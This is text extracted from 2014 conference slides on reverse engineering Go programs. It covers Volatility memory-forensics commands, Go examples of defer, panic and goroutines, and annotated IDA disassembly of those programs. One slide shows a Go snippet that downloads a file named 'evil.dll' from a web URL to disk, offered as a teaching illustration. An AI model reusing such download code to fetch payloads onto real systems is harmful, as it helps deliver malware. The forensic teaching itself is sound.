re(:)&go - center for computation and technologygolden/materials/dfrws2014-go... · 2017. 1....

RE(:)&go Golden G. Richard III

University of New Orleans and Arcane Alloy, LLC

[email protected] [email protected]

http://www.cs.uno.edu/~golden

http://www.arcanealloy.com

@nolaforensix

"#"python"vol.py"ttprofile=WinXPSP3x86"–f"YOURtUS67PI6LUVt20121017t214253.raw"strings"

ts"strings.txt"ttoutputtfile=stringslocaHon.txt"tS"

#"strings"–o"–e"l"YOURtUS67PI6LUVt20121017t214253.raw"|"grep"VERYUNIQUE">"

strings.txt""

"

467105092:VERYUNIQUE"

1bd77544"[3772:0012f544]"VERYUNIQUE"

#"python"vol.py"ttprofile=WinXPSP3x86"tf"YOURtUS67PI6LUVt20121017t214253.raw""pslist"

0x82c24bf0"xmlavipv.exe"""""""""""3772"""1592""""""2"""""""78""""""0""""""0"2012t10t17"21:41:20""

#"python"vol.py"ttprofile=WinXPSP3x86"tf"YOURtUS67PI6LUVt20121017t214253.raw""tp"

3772"memdump"

…"

PID"of"process"whose"address"space"includes"string"

Search&memory&dump&for&invalid&password&VERYUNIQUE&

Map&locaIon&of&invalid&pw&to&owning&process&

Verify&that&it’s&the&process&that&gets&spawned&

when&dialog&opens&

Dump&memory&of&that&process&

Copyright"2014"by"Golden"G."Richard"III"(@nolaforensix)"

15"

SQL&Slammer&

Copyright"2014"by"Golden"G."Richard"III"(@nolaforensix)"

45"

SQL&Slammer&

©"2014"by"Golden"G."Richard"III"(@nolaforensix)"

46"


66"package main import ( "fmt" "net/http" ) func handler(w http.ResponseWriter, r *http.Request) { fmt.Fprintf(w, "Hi there, I love %s!", r.URL.Path[1:]) } func main() { http.HandleFunc("/", handler) http.ListenAndServe(":8080", nil) }

Example:&web&stuff&is&absurdly&easy…&


67"package main import "net/http" import "io" import "os" import "fmt" func main() {

out, _ := os.Create("evil.dll") defer out.Close() resp, err :=

http.Get("http://www.cs.uno.edu/~golden/evil.dll") if err != nil { fmt.Println("oops.") } defer resp.Body.Close() n, err := io.Copy(out, resp.Body) // automatically chunks file if err != nil { fmt.Println("oops.") } else { fmt.Printf("Wrote %d bytes\n", n) }

}

defer,&gorouInes,&reflecIon&

•  Defer"allows"funcHon"calls"to"be"delayed"and"stacked"•  Processed"in"order"when"a"funcHon"completes"

•  For"easy"cleanup,"error"handling"•  defer"+"panic"+"recover"chosen"instead"of"excepHons"•  gorouHnes"provide"full"concurrency"support"•  Trivial"to"implement"mulHthreading"

•  gorouHnes"use"CSPtlike"communicaHon"/"

synchronizaHon""

•  go"is"staHcally"typed"•  But"reflecHon"allows"evaluaHon"of"types"at"run"Hme"


68"

Original"CSP"paper"from"~1978—MUST"READ"for""every"CS"person:"h=p://dl.acm.org/citaHon.cfm?id=359585"

No&defer&


69"

func CopyFile(dstName, srcName string) (written int64, err error) { src, err := os.Open(srcName) if err != nil { return } dst, err := os.Create(dstName) if err != nil { return // oops } written, err = io.Copy(dst, src) dst.Close() src.Close() return }

With&defer&


70"

func CopyFile(dstName, srcName string) (written int64, err error) { src, err := os.Open(srcName) if err != nil { return } defer src.Close() dst, err := os.Create(dstName) if err != nil { return } defer dst.Close() return io.Copy(dst, src) }

Deferred&funcIon&calls&unstacked&and&executed&


71"func"main()"{"

""""""""var"examples"="[]string{"

"""""""""""""""""1"2"3"4"5","

"""""""""""""""""100"50"25"12.5"6.25","

"""""""""""""""""2"+"2"="4","

"""""""""""""""""1st"class","

"""""""""""""""""","

""""""""}"

"

""""""""for"_,"ex":="range"examples"{"

""""""""""""""""fmt.Prin�("Parsing"%q:\n""","ex)"

""""""""""""""""nums,&err&:=&Parse(ex)&

""""""""""""""""if"err"!="nil"{"

""""""""""""""""""""""""fmt.Println(err)"

""""""""""""""""""""""""conHnue"

""""""""""""""""}"

""""""""""""""""fmt.Println(nums)"

""""""""}"

}"Example"adapted"from:"h=ps://code.google.com/p/gotwiki/wiki/PanicAndRecover"


72"//"Parse"parses"the"spacetseparated"words"in"input"as"integers."

func"Parse(input"string)"(numbers&[]int,&err&error)&{"

"""""&&&defer&func()&{&

&&&&&&&&&&&&&&&&if&r&:=&recover();&r&!=&nil&{&

&&&&&&&&&&&&&&&&&&&&&&&&var&ok&bool&

&&&&&&&&&&&&&&&&&&&&&&&&err,&ok&=&r.(error)&

&&&&&&&&&&&&&&&&&&&&&&&&if&!ok&{&

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&err&=&fmt.Errorf("pkg:&%v",&r)&

&&&&&&&&&&&&&&&&&&&&&&&&}&

&&&&&&&&&&&&&&&&}&

&&&&&&&&}()&

"

""""""""fields":="strings.Fields(input)"

""""""""numbers"="fields2numbers(fields)"

""""""""return"

}"

return&&

values&

anonymous,&deferred&

error&handling&funcIon&

Disassemble"on"your"own"and"have"a"look"


73"

func"fields2numbers(fields"[]string)"(numbers"[]int)"{"

""""""""if"len(fields)"=="0"{"

""""""""""""""""panic("no"words"to"parse")"

""""""""}"

""""""""for"idx,"field":="range"fields"{"

""""""""""""""""num,"err":="strconv.Atoi(field)"

""""""""""""""""if&err&!=&nil&{&

&&&&&&&&&&&&&&&&&&&&&&&&panic(&ParseError{idx,&field,&err})&

""""""""""""""""}"

""""""""""""""""numbers"="append(numbers,"num)"

""""""""}"

""""""""return"

}"


74"//"A"ParseError"indicates"an"error"in"converHng"a"word"into"an"integer."

type"ParseError"struct"{"

""""""""Index"int"""""""""//"The"index"into"the"spacetseparated"list"of"words."

""""""""Word""string""//"The"word"that"generated"the"parse"error."

""""""""Error"error"""""//"The"raw"error"that"precipitated"this"error,"if"any."

}"

"

//"String"returns"a"humantreadable"error"message."

func"(e"*ParseError)"String()"string"{"

""""""""return"fmt.Sprin�("pkg:"error"parsing"%q"as"int","e.Word)"

}""

"

"


package main import "fmt” func drink_beer(c chan string, done chan bool) {

quit := false for ! quit { msg := <-c if msg == "thirsty" { fmt.Println("Drinking beer.") c <- "yum" } else { quit = (msg == "quit") } } fmt.Println("Beer drinking over for today.") done <- true

} func hack_hack_hack(c chan string, done chan bool) {

for i := 0; i < 10; i++ { fmt.Println("Hacking...") fmt.Println("Hacking...") c <- "thirsty" msg := <-c fmt.Println(msg) }

fmt.Println("Hacking over for today.") c <- "quit" done <- true

}

func main() { c := make(chan string) donebeering := make(chan bool) donehacking := make(chan bool) fmt.Println("Starting day.") go drink_beer(c, donebeering) go hack_hack_hack(c, donehacking) <-donebeering <-donehacking fmt.Println("ZZZZZZzzzzz...")

} "

Starting day. Hacking... Hacking... Drinking beer. yum Hacking... Hacking... Drinking beer. yum Hacking... Hacking... Drinking beer. yum … Hacking... Hacking... Drinking beer. yum Hacking over for today. Beer drinking over for today. ZZZZZZzzzzz...

84"


85"package main import "fmt” func main() {

c := make(chan string) donebeering := make(chan bool) donehacking := make(chan bool) fmt.Println("Starting day.") go drink_beer(c, donebeering) go hack_hack_hack(c, donehacking) <-donebeering <-donehacking fmt.Println("ZZZZZZzzzzz...")

}


86"

func hack_hack_hack(c chan string, done chan bool) { for i := 0; i < 10; i++ { fmt.Println("Hacking...") fmt.Println("Hacking...") c <- "thirsty" msg := <-c fmt.Println(msg) }

fmt.Println("Hacking over for today.") c <- "quit" done <- true

}


87"

func drink_beer(c chan string, done chan bool) {

quit := false for ! quit { msg := <-c if msg == "thirsty" { fmt.Println("Drinking beer.") c <- "yum" } else { quit = (msg == "quit") } } fmt.Println("Beer drinking over for today.") done <- true

}

String&RepresentaIon:&ptr&+&len&


89"

len"

string"data"

ptr"

HEADER:0000000100000000 ;HEADER:0000000100000000 ; +-------------------------------------------------------------------------+HEADER:0000000100000000 ; | This file has been generated by The Interactive Disassembler (IDA) |HEADER:0000000100000000 ; | Copyright (c) 2014 Hex-Rays, <[email protected]> |HEADER:0000000100000000 ; | License info: 48-B071-7234-BB |HEADER:0000000100000000 ; | Golden Richard, University of New Orleans |HEADER:0000000100000000 ; +-------------------------------------------------------------------------+HEADER:0000000100000000 ;HEADER:0000000100000000 ; Input MD5 : D1535E081F4854A43C93242537C5344AHEADER:0000000100000000 ; Input CRC32 : B2936869HEADER:0000000100000000HEADER:0000000100000000HEADER:0000000100000000 .686pHEADER:0000000100000000 .mmxHEADER:0000000100000000 .model flatHEADER:0000000100000000 .intel_syntax noprefixHEADER:0000000100000000HEADER:0000000100000000 ; ===========================================================================HEADER:0000000100000000HEADER:0000000100000000 ; [00000F50 BYTES: COLLAPSED SEGMENT HEADER. PRESS KEYPAD CTRL-"+" TO EXPAND]__text:0000000100000F50 ; ===========================================================================__text:0000000100000F50__text:0000000100000F50 ; Segment type: Pure code__text:0000000100000F50 __text segment para public 'CODE' use64__text:0000000100000F50 assume cs:__text__text:0000000100000F50 ;org 100000F50h__text:0000000100000F50 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing__text:0000000100000F50__text:0000000100000F50 ; =============== S U B R O U T I N E =======================================__text:0000000100000F50__text:0000000100000F50 ; Attributes: bp-based frame__text:0000000100000F50__text:0000000100000F50 ; int __cdecl main(int argc, const char **argv, const char **envp)__text:0000000100000F50 public main__text:0000000100000F50 main proc near__text:0000000100000F50__text:0000000100000F50 var_4 = dword ptr -4__text:0000000100000F50__text:0000000100000F50 push rbp__text:0000000100000F51 mov rbp, rsp__text:0000000100000F54 sub rsp, 10h__text:0000000100000F58 lea rdi, aHello ; "hello\n"__text:0000000100000F5F mov al, 0__text:0000000100000F61 call _printf

file:///Users/golden/Work/Go/src/hello/helloc.lst.txt

1 of 2 8/1/14, 3:42 PM

__text:0000000100000F66 mov [rbp+var_4], eax__text:0000000100000F69 add rsp, 10h__text:0000000100000F6D pop rbp__text:0000000100000F6E retn__text:0000000100000F6E main endp__text:0000000100000F6E__text:0000000100000F6E __text ends

<<SNIP>>

__cstring:0000000100000F92 ; ===========================================================================__cstring:0000000100000F92__cstring:0000000100000F92 ; Segment type: Pure data__cstring:0000000100000F92 __cstring segment byte public 'DATA' use64__cstring:0000000100000F92 assume cs:__cstring__cstring:0000000100000F92 ;org 100000F92h__cstring:0000000100000F92 ; char aHello[]__cstring:0000000100000F92 aHello db 'hello',0Ah,0 ; DATA XREF: main+8 o__cstring:0000000100000F92 __cstring ends__cstring:0000000100000F92

file:///Users/golden/Work/Go/src/hello/helloc.lst.txt

2 of 2 8/1/14, 3:42 PM

HEADER:0000000000001000 ;HEADER:0000000000001000 ; +-------------------------------------------------------------------------+HEADER:0000000000001000 ; | This file has been generated by The Interactive Disassembler (IDA) |HEADER:0000000000001000 ; | Copyright (c) 2014 Hex-Rays, <[email protected]> |HEADER:0000000000001000 ; | License info: 48-B071-7234-BB |HEADER:0000000000001000 ; | Golden Richard, University of New Orleans |HEADER:0000000000001000 ; +-------------------------------------------------------------------------+HEADER:0000000000001000 ;HEADER:0000000000001000 ; Input MD5 : 3D9AAA6FC0A197892EEF6C101648C789HEADER:0000000000001000 ; Input CRC32 : 57BFBE8CHEADER:0000000000001000HEADER:0000000000001000HEADER:0000000000001000 include uni.inc ; see unicode subdir of ida for info on unicodeHEADER:0000000000001000HEADER:0000000000001000 .686pHEADER:0000000000001000 .mmxHEADER:0000000000001000 .model flatHEADER:0000000000001000 .intel_syntax noprefixHEADER:0000000000001000HEADER:0000000000001000 ; ===========================================================================HEADER:0000000000001000HEADER:0000000000001000 ; [00001000 BYTES: COLLAPSED SEGMENT HEADER. PRESS KEYPAD CTRL-"+" TO EXPAND]__text:0000000000002000 ; ===========================================================================__text:0000000000002000__text:0000000000002000 ; Segment type: Pure code__text:0000000000002000 __text segment para public 'CODE' use64__text:0000000000002000 assume cs:__text__text:0000000000002000 ;org 2000h__text:0000000000002000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing__text:0000000000002000__text:0000000000002000 ; =============== S U B R O U T I N E =======================================__text:0000000000002000__text:0000000000002000__text:0000000000002000 ; void __cdecl main_main()__text:0000000000002000 main_main proc near ; CODE XREF: main_main+13 j__text:0000000000002000 ; runtime_main+115 p__text:0000000000002000__text:0000000000002000 var_70 = qword ptr -70h__text:0000000000002000 var_68 = qword ptr -68h__text:0000000000002000 var_60 = qword ptr -60h__text:0000000000002000 var_38 = qword ptr -38h__text:0000000000002000 var_30 = qword ptr -30h__text:0000000000002000 var_28 = byte ptr -28h__text:0000000000002000 var_18 = qword ptr -18h

file:///Users/golden/Work/Go/src/hello/hellogo.lst.txt

1 of 3 8/1/14, 3:43 PM

__text:0000000000002000 var_10 = qword ptr -10h__text:0000000000002000 var_8 = qword ptr -8__text:0000000000002000__text:0000000000002000 mov rcx, gs:8A0h__text:0000000000002009 cmp rsp, [rcx]__text:000000000000200C ja short loc_2015__text:000000000000200E call runtime_morestack00_noctxt__text:0000000000002013 jmp short main_main__text:0000000000002015 ; ---------------------------------------------------------------------------__text:0000000000002015__text:0000000000002015 loc_2015: ; CODE XREF: main_main+C j__text:0000000000002015 sub rsp, 70h__text:0000000000002019 lea rbx, unk_C83E0 ; Representation of "Hello"__text:0000000000002021 mov rbp, [rbx]__text:0000000000002024 mov [rsp+70h+var_38], rbp__text:0000000000002029 mov rbp, [rbx+8]__text:000000000000202D mov [rsp+70h+var_30], rbp__text:0000000000002032 lea rdi, [rsp+70h+var_28]__text:0000000000002037 xor eax, eax__text:0000000000002039 stosq__text:000000000000203B stosq__text:000000000000203D lea rbx, [rsp+70h+var_28]__text:0000000000002042 cmp rbx, 0__text:0000000000002046 jz short loc_20AC__text:0000000000002048__text:0000000000002048 loc_2048: ; CODE XREF: main_main+AE j__text:0000000000002048 mov [rsp+70h+var_18], rbx__text:000000000000204D mov [rsp+70h+var_10], 1__text:0000000000002056 mov [rsp+70h+var_8], 1__text:000000000000205F mov [rsp+70h+var_70], offset unk_96940__text:0000000000002067 lea rbx, [rsp+70h+var_38]__text:000000000000206C mov [rsp+70h+var_68], rbx__text:0000000000002071 call runtime_convT2E__text:0000000000002076 mov rax, [rsp+70h+var_18]__text:000000000000207B lea rbx, [rsp+70h+var_60]__text:0000000000002080 mov rdi, rax ; n__text:0000000000002083 mov rsi, rbx ; err__text:0000000000002086 movsq__text:0000000000002088 movsq__text:000000000000208A mov [rsp+70h+var_70], rax ; a__text:000000000000208E mov rbx, [rsp+70h+var_10]__text:0000000000002093 mov [rsp+70h+var_68], rbx__text:0000000000002098 mov rbx, [rsp+70h+var_8]__text:000000000000209D mov [rsp+70h+var_60], rbx__text:00000000000020A2 call fmt_Println


2 of 3 8/1/14, 3:43 PM

__text:00000000000020A7 add rsp, 70h__text:00000000000020AB retn__text:00000000000020AC ; ---------------------------------------------------------------------------__text:00000000000020AC__text:00000000000020AC loc_20AC: ; CODE XREF: main_main+46 j__text:00000000000020AC mov [rbx], eax__text:00000000000020AE jmp short loc_2048__text:00000000000020AE main_main endp__text:00000000000020AE

<<SNIP>>

__rodata:00000000000C83E0 unk_C83E0 db 0F0h ; ð ; DATA XREF: main_main+19 o__rodata:00000000000C83E1 db 83h ; ƒ__rodata:00000000000C83E2 db 0Ch__rodata:00000000000C83E3 db 0__rodata:00000000000C83E4 db 0__rodata:00000000000C83E5 db 0__rodata:00000000000C83E6 db 0__rodata:00000000000C83E7 db 0__rodata:00000000000C83E8 db 6__rodata:00000000000C83E9 db 0__rodata:00000000000C83EA db 0__rodata:00000000000C83EB db 0__rodata:00000000000C83EC db 0__rodata:00000000000C83ED db 0__rodata:00000000000C83EE db 0__rodata:00000000000C83EF db 0__rodata:00000000000C83F0 db 48h ; H__rodata:00000000000C83F1 db 65h ; e__rodata:00000000000C83F2 db 6Ch ; l__rodata:00000000000C83F3 db 6Ch ; l__rodata:00000000000C83F4 db 6Fh ; o__rodata:00000000000C83F5 db 2Eh ; .__rodata:00000000000C83F6 db 0


3 of 3 8/1/14, 3:43 PM

HEADER:0000000000001000 ;HEADER:0000000000001000 ; +-------------------------------------------------------------------------+HEADER:0000000000001000 ; | This file has been generated by The Interactive Disassembler (IDA) |HEADER:0000000000001000 ; | Copyright (c) 2014 Hex-Rays, <[email protected]> |HEADER:0000000000001000 ; | License info: 48-B071-7234-BB |HEADER:0000000000001000 ; | Golden Richard, University of New Orleans |HEADER:0000000000001000 ; +-------------------------------------------------------------------------+HEADER:0000000000001000 ;HEADER:0000000000001000 ; Input MD5 : 044F4ED548C797FC23DBAB565464FD19HEADER:0000000000001000 ; Input CRC32 : 3FFD1B1DHEADER:0000000000001000HEADER:0000000000001000HEADER:0000000000001000 include uni.inc ; see unicode subdir of ida for info on unicodeHEADER:0000000000001000HEADER:0000000000001000 .686pHEADER:0000000000001000 .mmxHEADER:0000000000001000 .model flatHEADER:0000000000001000 .intel_syntax noprefixHEADER:0000000000001000HEADER:0000000000001000 ; ===========================================================================HEADER:0000000000001000HEADER:0000000000001000 ; [00001000 BYTES: COLLAPSED SEGMENT HEADER. PRESS KEYPAD CTRL-"+" TO EXPAND]__text:0000000000002000 ; ===========================================================================__text:0000000000002000__text:0000000000002000 ; Segment type: Pure code__text:0000000000002000 __text segment para public 'CODE' use64__text:0000000000002000 assume cs:__text__text:0000000000002000 ;org 2000h__text:0000000000002000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing__text:0000000000002000__text:0000000000002000 ; =============== S U B R O U T I N E =======================================__text:0000000000002000__text:0000000000002000 ; arg_0: channel c__text:0000000000002000 ; arg_8: channel done__text:0000000000002000 ; var_52: quit__text:0000000000002000__text:0000000000002000 ; void main_drink_beer(chan_string c, chan_bool done)__text:0000000000002000 main_drink_beer proc near ; CODE XREF: main_drink_beer+18 j__text:0000000000002000__text:0000000000002000 var_88 = qword ptr -88h__text:0000000000002000 var_80 = qword ptr -80h__text:0000000000002000 var_78 = qword ptr -78h__text:0000000000002000 var_70 = qword ptr -70h__text:0000000000002000 var_68 = byte ptr -68h

file:///Users/golden/Work/Go/src/day-1.3.lst.txt

1 of 15 8/1/14, 3:43 PM

__text:0000000000002000 var_52 = byte ptr -52h__text:0000000000002000 var_51 = byte ptr -51h__text:0000000000002000 var_48 = qword ptr -48h__text:0000000000002000 var_40 = qword ptr -40h__text:0000000000002000 var_38 = byte ptr -38h__text:0000000000002000 var_28 = qword ptr -28h__text:0000000000002000 var_20 = qword ptr -20h__text:0000000000002000 var_18 = qword ptr -18h__text:0000000000002000 var_10 = qword ptr -10h__text:0000000000002000 var_8 = qword ptr -8__text:0000000000002000 arg_0 = qword ptr 8__text:0000000000002000 arg_8 = qword ptr 10h__text:0000000000002000__text:0000000000002000 mov rcx, gs:8A0h ; Tracks allocated stack__text:0000000000002009 lea rax, [rsp+var_8]__text:000000000000200E cmp rax, [rcx]__text:0000000000002011 ja short loc_201A__text:0000000000002013 call runtime_morestack16_noctxt ; Need more stack space?__text:0000000000002018 jmp short main_drink_beer ; arg_0: channel c__text:0000000000002018 ; arg_8: channel done__text:0000000000002018 ; var_52: quit__text:000000000000201A ; ---------------------------------------------------------------------------__text:000000000000201A__text:000000000000201A loc_201A: ; CODE XREF: main_drink_beer+11 j__text:000000000000201A sub rsp, 88h ; Allocate stack space for variables__text:0000000000002021 xor rax, rax ; quit = false__text:0000000000002024__text:0000000000002024 loc_2024: ; CODE XREF: main_drink_beer+2C2 j__text:0000000000002024 ; main_drink_beer+2CA j__text:0000000000002024 cmp al, 0 ; Top tested loop: quit?__text:0000000000002026 mov [rsp+88h+var_52], al ; Stores value of quit var__text:000000000000202A jnz loc_21A9 ; Yes, skip loop body__text:0000000000002030__text:0000000000002030 loc_2030: ; CODE XREF: main_drink_beer+1A3 j__text:0000000000002030 mov [rsp+88h+var_28], 0__text:0000000000002039 mov [rsp+88h+var_20], 0__text:0000000000002042 mov [rsp+88h+var_88], offset unk_94600 ; Channel type__text:000000000000204A mov rbx, [rsp+88h+arg_0] ; Receive from channel "c"__text:0000000000002052 mov [rsp+88h+var_80], rbx__text:0000000000002057 lea rbx, [rsp+88h+var_28] ; Address of received data__text:000000000000205C mov [rsp+88h+var_78], rbx__text:0000000000002061 call runtime_chanrecv1 ; Call channel receive__text:0000000000002066 mov rcx, [rsp+88h+var_28] ; Grab data received over channel__text:000000000000206B mov [rsp+88h+var_48], rcx ; Stash it__text:0000000000002070 mov rax, [rsp+88h+var_20] ; Grab length of msg from channel


2 of 15 8/1/14, 3:43 PM

__text:0000000000002075 cmp rax, 7 ; Len is 7? ("thirsty")__text:0000000000002079 jnz loc_2280 ; No, immediately jump to "else"__text:000000000000207F mov [rsp+88h+var_88], rcx ; Stash message address__text:0000000000002083 mov [rsp+88h+var_40], rax ; Stash length of msg__text:0000000000002088 mov [rsp+88h+var_80], rax ; Stash length of msg again__text:000000000000208D lea rbp, unk_CCFA0 ; Representation of "thirsty"__text:0000000000002095 lea r8, [rsp+88h+var_78] ; Destination for "thirsty" representation__text:000000000000209A mov rdi, r8 ; Copy to destination, above__text:000000000000209D mov rsi, rbp ; Source is representation of thirsty__text:00000000000020A0 movsq ; Two movsq ops copy both address...__text:00000000000020A2 movsq ; ...and len of "thirsty"__text:00000000000020A4 call runtime_eqstring ; Just received "thirsty"?__text:00000000000020A9 mov rcx, [rsp+88h+var_48] ; Get data received over channel__text:00000000000020AE mov rax, [rsp+88h+var_40] ; Get length of data received__text:00000000000020B3 movzx rbx, [rsp+88h+var_68] ; Get result of eqstring call__text:00000000000020B9 cmp bl, 0 ; Returned false, no match__text:00000000000020BC jz loc_2280 ; Jump to "else"__text:00000000000020C2 lea rbx, unk_CE6E0 ; Representation of "Drinking beer."__text:00000000000020CA mov rbp, [rbx] ; Address of data for "Drinking beer."__text:00000000000020CD mov [rsp+88h+var_28], rbp ; Stash address__text:00000000000020D2 mov rbp, [rbx+8] ; Address of len for "Drinking beer."__text:00000000000020D6 mov [rsp+88h+var_20], rbp ; Stash len__text:00000000000020DB lea rdi, [rsp+88h+var_38] ; Madness introduced by Println()...__text:00000000000020E0 xor eax, eax__text:00000000000020E2 stosq__text:00000000000020E4 stosq__text:00000000000020E6 lea rbx, [rsp+88h+var_38]__text:00000000000020EB cmp rbx, 0__text:00000000000020EF jz loc_2279__text:00000000000020F5__text:00000000000020F5 loc_20F5: ; CODE XREF: main_drink_beer+27B j__text:00000000000020F5 mov [rsp+88h+var_18], rbx__text:00000000000020FA mov [rsp+88h+var_10], 1__text:0000000000002103 mov [rsp+88h+var_8], 1__text:000000000000210F mov [rsp+88h+var_88], offset unk_974E0__text:0000000000002117 lea rbx, [rsp+88h+var_28]__text:000000000000211C mov [rsp+88h+var_80], rbx__text:0000000000002121 call runtime_convT2E__text:0000000000002126 mov rax, [rsp+88h+var_18]__text:000000000000212B lea rbx, [rsp+88h+var_78]__text:0000000000002130 mov rdi, rax ; n__text:0000000000002133 mov rsi, rbx ; err__text:0000000000002136 movsq__text:0000000000002138 movsq__text:000000000000213A mov [rsp+88h+var_88], rax


3 of 15 8/1/14, 3:43 PM

__text:000000000000213E mov rbx, [rsp+88h+var_10]__text:0000000000002143 mov [rsp+88h+var_80], rbx__text:0000000000002148 mov rbx, [rsp+88h+var_8]__text:0000000000002150 mov [rsp+88h+var_78], rbx__text:0000000000002155 call fmt_Println ; Output "Drinking beer."__text:000000000000215A lea rbx, unk_CD360 ; Representation of "yum"__text:0000000000002162 mov rbp, [rbx]__text:0000000000002165 mov [rsp+88h+var_28], rbp ; Data portion of "yum"__text:000000000000216A mov rbp, [rbx+8]__text:000000000000216E mov [rsp+88h+var_20], rbp ; Len of "yum"__text:0000000000002173 mov [rsp+88h+var_88], offset unk_94600 ; Channel type__text:000000000000217B mov rbx, [rsp+88h+arg_0] ; Channel to send over__text:0000000000002183 mov [rsp+88h+var_80], rbx__text:0000000000002188 lea rbx, [rsp+88h+var_28] ; String to send is "yum"__text:000000000000218D mov [rsp+88h+var_78], rbx__text:0000000000002192 call runtime_chansend1__text:0000000000002197 movzx rax, [rsp+88h+var_52] ; Get value of quit var__text:000000000000219D cmp al, 0__text:000000000000219F mov [rsp+88h+var_52], al__text:00000000000021A3 jz loc_2030 ; Value of quit is zero, loop__text:00000000000021A9__text:00000000000021A9 loc_21A9: ; CODE XREF: main_drink_beer+2A j__text:00000000000021A9 lea rbx, unk_D8F40 ; Rep of "Beer drinking over for today."__text:00000000000021B1 mov rbp, [rbx]__text:00000000000021B4 mov [rsp+88h+var_28], rbp ; Stash data portion of string__text:00000000000021B9 mov rbp, [rbx+8]__text:00000000000021BD mov [rsp+88h+var_20], rbp ; Stash len of string__text:00000000000021C2 lea rdi, [rsp+88h+var_38] ; Madness introduced by Println()...__text:00000000000021C7 xor eax, eax__text:00000000000021C9 stosq__text:00000000000021CB stosq__text:00000000000021CD lea rbx, [rsp+88h+var_38]__text:00000000000021D2 cmp rbx, 0__text:00000000000021D6 jz loc_2272__text:00000000000021DC__text:00000000000021DC loc_21DC: ; CODE XREF: main_drink_beer+274 j__text:00000000000021DC mov [rsp+88h+var_18], rbx__text:00000000000021E1 mov [rsp+88h+var_10], 1__text:00000000000021EA mov [rsp+88h+var_8], 1__text:00000000000021F6 mov [rsp+88h+var_88], offset unk_974E0__text:00000000000021FE lea rbx, [rsp+88h+var_28]__text:0000000000002203 mov [rsp+88h+var_80], rbx__text:0000000000002208 call runtime_convT2E__text:000000000000220D mov rax, [rsp+88h+var_18]__text:0000000000002212 lea rbx, [rsp+88h+var_78]


4 of 15 8/1/14, 3:43 PM

__text:0000000000002217 mov rdi, rax ; n__text:000000000000221A mov rsi, rbx ; err__text:000000000000221D movsq__text:000000000000221F movsq__text:0000000000002221 mov [rsp+88h+var_88], rax__text:0000000000002225 mov rbx, [rsp+88h+var_10]__text:000000000000222A mov [rsp+88h+var_80], rbx__text:000000000000222F mov rbx, [rsp+88h+var_8]__text:0000000000002237 mov [rsp+88h+var_78], rbx__text:000000000000223C call fmt_Println ; Output "Drinking beer over for today."__text:0000000000002241 mov [rsp+88h+var_51], 1 ; 1 == Boolean true__text:0000000000002246 mov [rsp+88h+var_88], offset unk_945A0 ; Channel type__text:000000000000224E mov rbx, [rsp+88h+arg_8] ; Send to channel named "done"__text:0000000000002256 mov [rsp+88h+var_80], rbx__text:000000000000225B lea rbx, [rsp+88h+var_51] ; Value to send--1 == Boolean true__text:0000000000002260 mov [rsp+88h+var_78], rbx__text:0000000000002265 call runtime_chansend1 ; Send__text:000000000000226A add rsp, 88h ; Free stack space__text:0000000000002271 retn ; Done__text:0000000000002272 ; ---------------------------------------------------------------------------__text:0000000000002272__text:0000000000002272 loc_2272: ; CODE XREF: main_drink_beer+1D6 j__text:0000000000002272 mov [rbx], eax__text:0000000000002274 jmp loc_21DC__text:0000000000002279 ; ---------------------------------------------------------------------------__text:0000000000002279__text:0000000000002279 loc_2279: ; CODE XREF: main_drink_beer+EF j__text:0000000000002279 mov [rbx], eax__text:000000000000227B jmp loc_20F5__text:0000000000002280 ; ---------------------------------------------------------------------------__text:0000000000002280__text:0000000000002280 loc_2280: ; CODE XREF: main_drink_beer+79 j__text:0000000000002280 ; main_drink_beer+BC j__text:0000000000002280 mov [rsp+88h+var_40], rax ; Get len of msg from channel__text:0000000000002285 cmp rax, 4 ; Len is 4? ("quit")__text:0000000000002289 jnz short loc_22C7 ; Nope, goto bottom of loop__text:000000000000228B mov [rsp+88h+var_88], rcx__text:000000000000228F mov [rsp+88h+var_80], rax__text:0000000000002294 lea rbp, unk_CC880 ; Representation of "quit"__text:000000000000229C lea r8, [rsp+88h+var_78]__text:00000000000022A1 mov rdi, r8__text:00000000000022A4 mov rsi, rbp__text:00000000000022A7 movsq__text:00000000000022A9 movsq__text:00000000000022AB call runtime_eqstring ; Compare msg over channel to "done"


5 of 15 8/1/14, 3:43 PM

__text:00000000000022B0 movzx rbx, [rsp+88h+var_68]__text:00000000000022B6 cmp bl, 0 ; Equal?__text:00000000000022B9 jz short loc_22C7 ; Nope, jump and loop__text:00000000000022BB mov rax, 1 ; "quit" received, set quit = true__text:00000000000022C2 jmp loc_2024__text:00000000000022C7 ; ---------------------------------------------------------------------------__text:00000000000022C7__text:00000000000022C7 loc_22C7: ; CODE XREF: main_drink_beer+289 j__text:00000000000022C7 ; main_drink_beer+2B9 j__text:00000000000022C7 xor rax, rax ; Set quit = false so loop continues__text:00000000000022CA jmp loc_2024 ; Loop__text:00000000000022CA main_drink_beer endp__text:00000000000022CA__text:00000000000022CA ; ---------------------------------------------------------------------------__text:00000000000022CF align 10h__text:00000000000022D0__text:00000000000022D0 ; =============== S U B R O U T I N E =======================================__text:00000000000022D0__text:00000000000022D0__text:00000000000022D0 ; void main_hack_hack_hack(chan_string c, chan_bool done)__text:00000000000022D0 main_hack_hack_hack proc near ; CODE XREF: main_hack_hack_hack+18 j__text:00000000000022D0__text:00000000000022D0 var_90 = qword ptr -90h__text:00000000000022D0 var_88 = qword ptr -88h__text:00000000000022D0 var_80 = qword ptr -80h__text:00000000000022D0 var_59 = byte ptr -59h__text:00000000000022D0 var_58 = qword ptr -58h__text:00000000000022D0 var_48 = qword ptr -48h__text:00000000000022D0 var_40 = qword ptr -40h__text:00000000000022D0 var_38 = qword ptr -38h__text:00000000000022D0 var_30 = qword ptr -30h__text:00000000000022D0 var_28 = byte ptr -28h__text:00000000000022D0 var_18 = qword ptr -18h__text:00000000000022D0 var_10 = qword ptr -10h__text:00000000000022D0 var_8 = qword ptr -8__text:00000000000022D0 arg_0 = qword ptr 8__text:00000000000022D0 arg_8 = qword ptr 10h__text:00000000000022D0__text:00000000000022D0 mov rcx, gs:8A0h__text:00000000000022D9 lea rax, [rsp+var_10]__text:00000000000022DE cmp rax, [rcx]__text:00000000000022E1 ja short loc_22EA__text:00000000000022E3 call runtime_morestack16_noctxt__text:00000000000022E8 jmp short main_hack_hack_hack__text:00000000000022EA ; ---------------------------------------------------------------------------


6 of 15 8/1/14, 3:43 PM

